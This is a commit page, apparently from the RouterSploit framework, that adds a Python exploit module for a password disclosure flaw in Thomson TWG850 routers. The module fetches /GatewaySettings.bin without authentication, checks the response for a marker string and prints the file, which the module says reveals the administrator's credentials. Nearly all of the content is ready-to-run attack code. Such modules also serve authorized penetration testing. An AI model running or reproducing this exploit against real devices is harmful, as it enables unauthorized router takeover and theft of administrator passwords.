Commit 3293a140 by Marcin Bury

Thompson TWG850 Password Disclosure exploit.

parent c026726b
from routersploit import (
exploits,
print_success,
print_error,
print_info,
print_status,
http_request,
mute,
validators,
)
class Exploit(exploits.Exploit):
"""
Exploit implementation for Thomson TWG850 password disclosure vulnerability.
If the target is vulnerable, it allows read credentials for administration user.
"""
__info__ = {
'name': 'Thomson TWG850 Password Disclosure',
'description': 'Module exploits Thomson TWG850 password disclosure vulnerability which allows fetching administration\'s password.',
'authors': [
'Sebastian Perez', # vulnerability discovery
'Marcin Bury <marcin.bury[at]reverse-shell.com>', # routersploit module
],
'references': [
'https://packetstormsecurity.com/files/136135/Thomson-Router-TWG850-4U-XSS-CSRF-Unauthenticated-Access.html',
],
'devices': [
'Thomson TWG850',
]
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url)
port = exploits.Option(80, 'Target Port')
def run(self):
url = "{}:{}/GatewaySettings.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
if response.status_code == 200 and "0MLog" in response.text:
print_success("Exploit success")
print_status("Reading file GatewaySettings.bin")
print_info(response.text)
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
@mute
def check(self):
url = "{}:{}/GatewaySettings.bin".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
if response.status_code == 200 and "0MLog" in response.text:
return True # target is vulnerable
else:
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment